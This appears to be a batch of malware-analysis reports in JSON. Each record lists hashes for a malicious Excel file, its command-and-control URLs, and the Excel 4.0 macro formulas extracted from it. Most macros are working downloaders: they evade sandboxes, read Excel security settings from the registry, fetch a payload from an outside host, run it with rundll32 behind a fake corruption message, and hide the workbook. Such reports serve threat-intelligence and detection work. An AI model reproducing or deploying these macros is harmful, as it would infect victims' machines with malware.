{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ac0dfa758631d21c81ffdb3766edb75cef979ea5a7329bc409673ece020f9aa"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1ac0dfa758631d21c81ffdb3766edb75cef979ea5a7329bc409673ece020f9aa","filesize":225280,"md5":"dd335dfac9712d548da0de39784b0400","sha1":"e63c5420741a8cfe912489f7990f3eb0371193d8","sha256":"1ac0dfa758631d21c81ffdb3766edb75cef979ea5a7329bc409673ece020f9aa","sha512":"b50f7f5a47f3ef2c13473129d7b14a5730fa49eadbff04d3c9fb6cf13a92e2b04fe5857e83428478c3b17e712a1a3705009ab9705a27b1b6fadc55172b93522d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ac0dfa758631d21c81ffdb3766edb75cef979ea5a7329bc409673ece020f9aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1cbk4TwutE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1aecc59781e07fe93184cbea2dd82738ccd76045d6eda669329afa151aab0f17"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1aecc59781e07fe93184cbea2dd82738ccd76045d6eda669329afa151aab0f17","filesize":212992,"md5":"2540a592c24cfe9353e3d4955374c487","sha1":"c0d1fd70a86521ec63f30b01cea2f27d1c2eb55e","sha256":"1aecc59781e07fe93184cbea2dd82738ccd76045d6eda669329afa151aab0f17","sha512":"1e5283ac8bcbf9a3ae748376d2573df7d5f83e1d7cbb95285fa80e31b2a827ba00b1a5da396638b8827a03849e967a11604d14e8d0aeeb236452d0874c4650d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1aecc59781e07fe93184cbea2dd82738ccd76045d6eda669329afa151aab0f17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jSKc0lq44Y\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1af6d2b77a8c163d5221f802a587fb920ad89a088552f401d9bc4025d48cf21d"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1af6d2b77a8c163d5221f802a587fb920ad89a088552f401d9bc4025d48cf21d","filesize":116224,"md5":"e640e7104d8e9fe0746250e2731b168a","sha1":"bb939f15edd96201218834c49813d4a35b824c90","sha256":"1af6d2b77a8c163d5221f802a587fb920ad89a088552f401d9bc4025d48cf21d","sha512":"23d2cb70efa9a517c54df08e1b6e9eea8a0d45fe1c95a9119726da50257ddc4373c54bb45730fbb286b91585d8661460f65e9887a0fc8bf7cd30f454189c2293","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1af6d2b77a8c163d5221f802a587fb920ad89a088552f401d9bc4025d48cf21d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rP75OV7ewV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1afcbf6e45b819d746c2c36446477c6ce504ab9e16e57b46ce1d93efdb498be9"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1afcbf6e45b819d746c2c36446477c6ce504ab9e16e57b46ce1d93efdb498be9","filesize":113664,"md5":"ec8e6ad2ed33ea47c165959484797e8e","sha1":"b2e503293591a6ee50e9f980fa6440e8ecddd661","sha256":"1afcbf6e45b819d746c2c36446477c6ce504ab9e16e57b46ce1d93efdb498be9","sha512":"e498b4a81e0ee20c2a5fb2db8f9715004851c408c7973434f8845f070a8e5da0bf88f9f64bc5aa1fb6ed0c518381df25aab31a19ec714942e1d818d3d5d3d953","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1afcbf6e45b819d746c2c36446477c6ce504ab9e16e57b46ce1d93efdb498be9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fQMUKJWMMX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b174b196e5ed7ff31cc229930324b9e59d88960a8b01980e1655e462bb78a0f"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b174b196e5ed7ff31cc229930324b9e59d88960a8b01980e1655e462bb78a0f","filesize":112128,"md5":"bf0e701839e1a72a65ff03e42a173f5a","sha1":"6bd35e09ccda4c86fb09454fb10de7802ed3ff8b","sha256":"1b174b196e5ed7ff31cc229930324b9e59d88960a8b01980e1655e462bb78a0f","sha512":"face5ab2facec83877ee6093225228e4f07c1fd8de6d1d2d889d8cca7ae4091ea4d5bd93e30ef3e95024820234aca004a1c057c79ebdaa8b76c828673e59496a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b174b196e5ed7ff31cc229930324b9e59d88960a8b01980e1655e462bb78a0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b31a967570ac1e599edf3800796b816a8644d6a6753e7c2484584c6027c6ae1"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b31a967570ac1e599edf3800796b816a8644d6a6753e7c2484584c6027c6ae1","filesize":152576,"md5":"3003c41b0f90c607d2ca2ae018539ebd","sha1":"2c6a13e5ef9b429d567d28f6c6c7c797fec0ba49","sha256":"1b31a967570ac1e599edf3800796b816a8644d6a6753e7c2484584c6027c6ae1","sha512":"27da3f09763de5163bb26bc00a0340d14ac10a346a9cf6e5bcd4d8e0528bd622a24b010c9fa1a3435303ed9de732a3d1c8b3d6df01cd933c76afe4f2381a393e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b31a967570ac1e599edf3800796b816a8644d6a6753e7c2484584c6027c6ae1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yHmXE8ynw6\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b3dcb79661f035e12c991cce7b56c9afc60f958335ff907624b91aa01f775ea"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b3dcb79661f035e12c991cce7b56c9afc60f958335ff907624b91aa01f775ea","filesize":212992,"md5":"68ca7ed629b47fe5430e71c1b03fbff0","sha1":"7bb68d38ea162f5930a730dddc3aad71c4b53c33","sha256":"1b3dcb79661f035e12c991cce7b56c9afc60f958335ff907624b91aa01f775ea","sha512":"c48ef8efb6e66d139276242c6e2c5e7425e3e93bb408e846b754ed7d972d91bb7249b40038d3f7004e1e6fc9bebb396d1476aedf4b027731b4d8efb6f3e9063a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b3dcb79661f035e12c991cce7b56c9afc60f958335ff907624b91aa01f775ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BwJlOvhIOl\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b5157d45c23f6f61d9fb067c86b6be6e3ad6feed2a3961b66c607ac84dac4e9"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b5157d45c23f6f61d9fb067c86b6be6e3ad6feed2a3961b66c607ac84dac4e9","filesize":170496,"md5":"9ce3c253d12132eaa03b56bea3e7e384","sha1":"ce0470c3a0ae56ad3a1c7767b1affad2916e20ef","sha256":"1b5157d45c23f6f61d9fb067c86b6be6e3ad6feed2a3961b66c607ac84dac4e9","sha512":"2eece609bbf6c9e8c00403ede175afa61dd375e56242cfe76c04f924ba64e6cb7f09b4ba6ac0f5ac97012d3fc7ed41733fed9c5dd279f38a8853c7a0b1bb502d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b5157d45c23f6f61d9fb067c86b6be6e3ad6feed2a3961b66c607ac84dac4e9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MxjrJ1PI98\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b5e3acd6c5fc4a2281158a2f8b9f8bcb57884824de600bda7b6c347e5819507"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b5e3acd6c5fc4a2281158a2f8b9f8bcb57884824de600bda7b6c347e5819507","filesize":73728,"md5":"954237562550b1dd8a2a34d070245752","sha1":"05d762e11c1e315ca901e1e481b497573a0dfaca","sha256":"1b5e3acd6c5fc4a2281158a2f8b9f8bcb57884824de600bda7b6c347e5819507","sha512":"e367932ef519851a6f9eb8147c458dc7bacc9fba24e3b1aa7bad12e2029227ec5a8fd32ab48df9e6cdd1d57614d17214b4292aea30d46168a84f1a6a43e736e2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b5e3acd6c5fc4a2281158a2f8b9f8bcb57884824de600bda7b6c347e5819507.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(R$7C$18\u003c0,R$7C$8-R$7C$15,0)\nIF(R$8C$18\u003c0,R$8C$8-R$8C$15,0)\nIF(R$9C$18\u003c0,R$9C$8-R$9C$15,0)\nIF(R$12C$18\u003c0,R$12C$8-R$12C$15,0)\nIF(R$13C$18\u003c0,R$13C$8-R$13C$15,0)\nIF(R$14C$18\u003c0,R$14C$8-R$14C$15,0)\nIF(R$17C$18\u003c0,R$17C$8-R$17C$15,0)\nIF(R$18C$18\u003c0,R$18C$8-R$18C$15,0)\nIF(R$19C$18\u003c0,R$19C$8-R$19C$15,0)\nIF(R$22C$18\u003c0,R$22C$8-R$22C$15,0)\nIF(R$23C$18\u003c0,R$23C$8-R$23C$15,0)\nIF(R$24C$18\u003c0,R$24C$8-R$24C$15,0)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b73070d61e9c6cbc2121c100209b4537b551c7bf03be003656c9226514e0e8e"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b73070d61e9c6cbc2121c100209b4537b551c7bf03be003656c9226514e0e8e","filesize":170496,"md5":"77008d14a1dde2e8c41158bc9f599206","sha1":"a463dead7e2fdb7e753c9adc2540aec9a6dc7ca1","sha256":"1b73070d61e9c6cbc2121c100209b4537b551c7bf03be003656c9226514e0e8e","sha512":"9ba9e67121d04aa8469c6fd268043389cffe2684a1ad473573a0d9f678b188d92584fc75d4d7b55b251406a4b87fc043a9f21e8ba32935eec7f41a3394bc8eb3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b73070d61e9c6cbc2121c100209b4537b551c7bf03be003656c9226514e0e8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jMCXmh1CFD\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b7dc7b5dc4b871f09966d377076e43b6c238bbf4d64e672f091881288c76aa5"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b7dc7b5dc4b871f09966d377076e43b6c238bbf4d64e672f091881288c76aa5","filesize":152576,"md5":"0d737af7192f7c02a63727639a00cc93","sha1":"f76b2831d15a31545d3262b5fc883a0dfad77409","sha256":"1b7dc7b5dc4b871f09966d377076e43b6c238bbf4d64e672f091881288c76aa5","sha512":"e2b8eace5ea73d522e89849a342f3e392e5278233e2966c8a669817c79c6b653cb8ae01e237693783c78a26c7decb88f7954a6d89c156f54c43cfeb9284a1ae8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b7dc7b5dc4b871f09966d377076e43b6c238bbf4d64e672f091881288c76aa5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HK51eby2r4\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1b8ddc8e37d8d4690c3933b93d5782ecb55bd9157240130bbb113ae46a8cd0f9"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1b8ddc8e37d8d4690c3933b93d5782ecb55bd9157240130bbb113ae46a8cd0f9","filesize":167936,"md5":"1292cb6bb3c6b8816634ec120972318c","sha1":"1c744bfa8b1fce8d380ec31c98701faee9aac086","sha256":"1b8ddc8e37d8d4690c3933b93d5782ecb55bd9157240130bbb113ae46a8cd0f9","sha512":"3a82cc67b5b5de408b1767403592248fb63e41525364ecc3208773ce9714c547e0b45efa54cda65a2c6797ea2ba1799185eaf7d4774b7dbb7291069feff08b2d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1b8ddc8e37d8d4690c3933b93d5782ecb55bd9157240130bbb113ae46a8cd0f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1E6v12wjEV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ba02edeac6d18746417edf00d29a9ba768b6baab0ce105201d25c56d2c4a94c"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1ba02edeac6d18746417edf00d29a9ba768b6baab0ce105201d25c56d2c4a94c","filesize":144896,"md5":"b28d7f2c21c9e852e2cc0843807f6e3d","sha1":"660c209510c7490224413e02638059519709d296","sha256":"1ba02edeac6d18746417edf00d29a9ba768b6baab0ce105201d25c56d2c4a94c","sha512":"e531ed773c8ba5b53e23e5ddd22cf01bf677832867be75691450987ab60f5f7bd8781dac40154f2095ad62fa9485fde6111e10ef6cb60f299437fa1f16edfaa4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ba02edeac6d18746417edf00d29a9ba768b6baab0ce105201d25c56d2c4a94c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ba84ddb8b8a6f2b51e8e1fc3981913d1d70988edf88d06b65775d5523350639"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1ba84ddb8b8a6f2b51e8e1fc3981913d1d70988edf88d06b65775d5523350639","filesize":116224,"md5":"21b0b95f30b91f4ed7147d5dfe7eb0e4","sha1":"db871c64798bb63167984a41ed5c8200e5c4269a","sha256":"1ba84ddb8b8a6f2b51e8e1fc3981913d1d70988edf88d06b65775d5523350639","sha512":"26a9748607281001093c581b9c18611293e001952dbfd92cc1f1866923370e81b122ecdfcd81e9d72e25241acb24baa2f8e0e8923573a42bafc8a94ec95942a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ba84ddb8b8a6f2b51e8e1fc3981913d1d70988edf88d06b65775d5523350639.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hZ74oOArRd\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1bcf0bc77522eda47750a9402abc571eafa55cda8b48660f2f466bf2fc7044c7"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1bcf0bc77522eda47750a9402abc571eafa55cda8b48660f2f466bf2fc7044c7","filesize":112640,"md5":"114671a70c866fb854caf91204ca35b8","sha1":"f6458d0d724e57aa4062e2a15bdbc74aeca6d6bc","sha256":"1bcf0bc77522eda47750a9402abc571eafa55cda8b48660f2f466bf2fc7044c7","sha512":"f3176bba9f88cf076ddb34fc05d1c53dc1c3ba23d3e83ddb07b48916c5ca3265c19b98e9d2898623c3ff7d154a3ef157fa4e8559095c365aa76fd7e2d7135f67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1bcf0bc77522eda47750a9402abc571eafa55cda8b48660f2f466bf2fc7044c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
